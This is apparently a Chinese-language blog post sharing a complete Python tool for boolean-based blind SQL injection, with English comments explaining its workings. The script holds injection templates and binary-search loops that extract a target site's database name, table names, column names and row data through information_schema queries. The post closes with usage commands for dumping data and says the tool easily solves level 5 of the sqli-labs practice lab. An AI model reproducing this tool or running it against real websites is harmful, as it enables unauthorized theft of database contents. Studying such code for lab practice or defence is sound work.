python脚本之布尔盲注

这个好像也没什么可以多说了,那么直接上脚本吧

import optparse
import requests
#----------------------------
# Command-line interface. Every parsed option lands on the module-level
# `options` object, which the probing functions below read directly.
usage = "python3 %prog -u <URL>  -P <patten> -F <find text>"
parser = optparse.OptionParser(usage)
_OPTION_SPECS = [
    ('-u', '--url', 'url', 'target url'),
    ('-P', '--patten', 'patten', 'patten'),
    ('-F', '--find', 'text', 'find text'),
    ('-T', '--tbname', 'tbname', 'target table_name'),
    ('-C', '--clname', 'clname', 'target column_name'),
]
for _short_flag, _long_flag, _dest_name, _help_text in _OPTION_SPECS:
    parser.add_option(_short_flag, _long_flag, dest=_dest_name, help=_help_text)
(options, args) = parser.parse_args()
#-------------------------------

# Injection templates. Each `{n}` placeholder is filled with str.format by the
# functions below and the result is appended verbatim to options.url. Every
# template is a boolean condition: the only signal the script reads back is
# whether the response body contains options.text.
# Educator's note: the `>{n}` comparison templates are what make the
# character-by-character binary search below work; the request volume that
# search produces (a burst of near-identical URLs differing only in the
# injected numbers) is also what makes it visible in web-server logs, and
# parameterized queries on the server leave no concatenation point for it.

ck_dblen  = " and length(database())={0} --+"
ck_dbname = " and ascii(substr(database(),{0},1))>{1} --+"
ck_tbnum  = " and (select count(table_name) from information_schema.tables where table_schema=database())={0}--+"
ck_tbname = " and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))>{2} --+"
ck_clnum  = " and (select count(column_name) from information_schema.columns where table_name='{1}')={0}--+"
ck_clname = " and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1))>{3} --+"
ck_data = " and ascii(substr((select {0} from {1} limit {2},1),{3},1))>{4} --+"



def _dbname() -> None:
    """Recover the current database name one character at a time.

    Reads the module-level ``options`` (``url``, ``text``) and the
    ``ck_dblen`` / ``ck_dbname`` templates. Side effects: one HTTP GET per
    probe and output via ``print``; returns nothing.
    """
    # Length probe: every candidate length 1..19 is tried and each one whose
    # response contains options.text is printed. The loop never breaks, so
    # when it ends `i` is always 19 (the last range value), not the length
    # that was printed.
    for i in range(1,20):
        # ck_dblen  = " and length(database())={0} --+"
        payload = options.url + ck_dblen.format(i) #ck_dblen
        res = requests.get(payload)
        # find() returns the match offset, so a hit at offset 0 or 1 counts
        # as "not found" under this `> 1` test.
        if res.text.find(options.text)>1:
            print("db_length: ",i)
    dbname = ''
    # Position loop: because `i` is 19 here, positions 1..19 are always
    # probed, independent of the length reported above.
    for k in range(1, i+1):
        # Binary search over ASCII 33..127. Each request asks "is the code at
        # this position > mid?", so a position costs about seven requests.
        lmin = 33
        lmax = 127
        while lmax - lmin > 1:
            mid = (lmin + lmax) >> 1
            # ck_dbname = " and ascii(substr(database(),{0},1))>{1} --+"
            payload = options.url + ck_dbname.format(k, mid) #ck_dbname
            res = requests.get(payload)
            if res.text.find(options.text) > 1:
                lmin = mid
            else:
                lmax = mid
        dbname += chr(lmax)
    # `lmax` still holds the value converged on for the last (19th) position;
    # presumably that is the filler character produced for positions beyond
    # the real name's end, which is why it is stripped before printing.
    print(dbname.replace(chr(lmax),''))



def _tbname() -> None:
    """Count the tables in the current database and print each table name.

    Reads the module-level ``options`` (``url``, ``text``) and the
    ``ck_tbnum`` / ``ck_tbname`` templates. Side effects: one HTTP GET per
    probe and output via ``print``; returns nothing.
    """
    # `s` ends up as the last candidate count (1..19) whose response
    # contained options.text; it stays 0 if none did, and then no name is
    # probed below.
    s = 0
    for i in range(1,20):
        # ck_tbnum  = " and (select count(table_name) from information_schema.tables where table_schema=database())={0}--+"
        payload = options.url + ck_tbnum.format(i) #ck_tbnum
        res = requests.get(payload)
        # find() offsets 0 and 1 are treated as "not found" by `> 1`.
        if res.text.find(options.text)>1:
            s = i
            print("Fetch {0} tables: ".format(i))
    num = 0
    # One table per outer iteration: `num` is the `limit {0},1` offset.
    while (s - num > 0):
        tbname = '' # reset inside the loop so each table name starts fresh
        # Always probes positions 1..19 of the name, whatever its real length.
        for k in range(1,20):
            # Binary search over ASCII 33..127, about seven requests/position.
            lmin = 33
            lmax = 127
            while lmax - lmin > 1:
                mid = (lmin+lmax) >> 1
                # ck_tbname = " and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))>{2} --+"
                payload = options.url + ck_tbname.format(num,k,mid) #ck_tbname
                res = requests.get(payload)
                if res.text.find(options.text) > 1:
                    lmin = mid
                else:
                    lmax = mid
            tbname += chr(lmax)
        # `lmax` is the value found for position 19; presumably the filler
        # produced past the name's end, so it is stripped before printing.
        print(tbname.replace(chr(lmax),''))
        num += 1




def _clname() -> None:
    """Count the columns of ``options.tbname`` and print each column name.

    Reads the module-level ``options`` (``url``, ``text``, ``tbname``) and
    the ``ck_clnum`` / ``ck_clname`` templates. ``options.tbname`` comes
    straight from the command line and is interpolated into the templates
    unchanged. Side effects: one HTTP GET per probe and output via
    ``print``; returns nothing.
    """
    #------------------------check column num
    s = 0 # `s` becomes the last matching column count (1..19); 0 if none matched
    for i in range(1, 20):
        # ck_clnum  = " and (select count(column_name) from information_schema.columns where table_name='{1}')={0}--+"
        payload = options.url + ck_clnum.format(i,options.tbname) #ck_clnum
        res = requests.get(payload)
        # find() offsets 0 and 1 are treated as "not found" by `> 1`.
        if res.text.find(options.text) > 1:
            s = i
            print("Fetch {0} columns".format(i))
    #-------------------------------------
    num = 0
    while (s - num >0): # s is the number of columns; num is the `limit` offset
        clname = ''
        for k in range(1,20): # one character at a time, positions 1..19
            # Binary search over ASCII 33..127, about seven requests/position.
            lmin =33
            lmax =127
            while lmax - lmin > 1:
                mid = (lmin+lmax) >> 1
                # ck_clname = " and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1))>{3} --+"
                payload = options.url + ck_clname.format(options.tbname,num,k,mid) #ck_clname
                res = requests.get(payload)
                if res.text.find(options.text) > 1:
                    lmin = mid
                else:
                    lmax = mid
            clname += chr(lmax)
        # `lmax` is the value found for position 19; presumably the filler
        # produced past the name's end, so it is stripped before printing.
        print(clname.replace(chr(lmax), ''))
        num +=1

# ck_data = " and ascii(substr((select {0} from {1} limit {2},1),{3},1))>{4} --+"
#                                 clname   tbname    num     k      mid
def _getdata() -> None:
    """Print the value of ``options.clname`` for the first 20 rows of ``options.tbname``.

    Unlike ``_tbname`` / ``_clname`` there is no count probe: rows 0..19 are
    always tried, and only positions 1..14 of each value are read. Reads the
    module-level ``options`` (``url``, ``text``, ``tbname``, ``clname``) and
    the ``ck_data`` template; both names come straight from the command line
    and are interpolated unchanged. Side effects: one HTTP GET per probe and
    output via ``print``; returns nothing.
    """
    num = 0
    while (num < 20):
        data = ''
        for k in range(1,15):
            # Binary search over ASCII 33..127, about seven requests/position.
            lmin = 33
            lmax = 127
            while lmax - lmin > 1:
                mid = (lmin+lmax) >> 1
                payload = options.url + ck_data.format(options.clname,options.tbname,num,k,mid)
                res = requests.get(payload)
                # find() offsets 0 and 1 are treated as "not found" by `> 1`.
                if res.text.find(options.text) > 1:
                    lmin = mid
                else:
                    lmax = mid
            data += chr(lmax)
        # `lmax` is the value found for position 14; presumably the filler
        # produced past the value's end, so it is stripped before printing.
        print(data.replace(chr(lmax),''))
        num += 1



# Dispatch on which options were supplied: -F alone enumerates the database
# and its tables, -F with -T the columns of that table, -F with -T and -C the
# rows. The -P/--patten option is parsed above but never read anywhere.
# Nothing runs when -F/--find is absent.
if(options.text) and (options.tbname) and (options.clname):
    _getdata()
elif (options.text) and (options.tbname):
    _clname()
elif(options.text):
    _dbname()
    _tbname()

真·shui文,hh
大概用法就是:

python python.py -F 需要查找的文本 -u URL 

这样可以爆出数据库名和表名

python python.py -F 需要查找的文本 -u URL -T 表名

这样可以爆出字段名

python python.py -F 需要查找的文本 -u URL -T 表名 -C 字段名

爆数据
亲测sqlilab第五关随便通,还是挺有用的,后续有机会的话再添加功能吧,慢慢来。
